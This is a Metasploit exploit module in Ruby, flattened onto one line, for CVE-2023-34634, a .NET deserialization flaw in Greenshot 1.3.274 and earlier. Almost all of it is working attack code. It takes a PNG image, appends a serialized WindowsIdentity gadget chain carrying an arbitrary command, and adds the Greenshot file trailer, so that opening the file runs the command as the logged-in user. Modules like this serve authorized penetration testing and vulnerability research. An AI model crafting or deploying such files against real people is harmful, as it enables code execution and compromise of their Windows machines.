## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Post::File def initialize(info = {}) super( update_info( info, 'Name' => 'Greenshot .NET Deserialization Fileformat Exploit', 'Description' => %q{ There exists a .NET deserialization vulnerability in Greenshot version 1.3.274 and below. The deserialization allows the execution of commands when a user opens a Greenshot file. The commands execute under the same permissions as the Greenshot service. Typically, is the logged in user. }, 'DisclosureDate' => '2023-07-26', 'Author' => [ 'p4r4bellum', # Discovery 'bwatters-r7', # msf exploit ], 'References' => [ ['CVE', '2023-34634'], ['EDB', '51633'] ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Windows', {} ], ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] } ) ) register_options([ OptPath.new('PNG_FILE', [false, 'PNG file to use']) ]) end def exploit if datastore['PNG_FILE'].blank? image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png') else image_file = datastore['PNG_FILE'] end datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank? if datastore['FILENAME'].length < 10 || datastore['FILENAME'][-10, -1] != '.greenshot' datastore['FILENAME'] << '.greenshot' end cmd = payload.encoded image_data = File.binread(image_file) deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate( cmd, gadget_chain: :WindowsIdentity, formatter: :BinaryFormatter ) payload_length = deserialize_cmd.length outfile = image_data outfile << deserialize_cmd outfile << [payload_length].pack('Q') outfile << 'Greenshot01.02' file_create(outfile) end end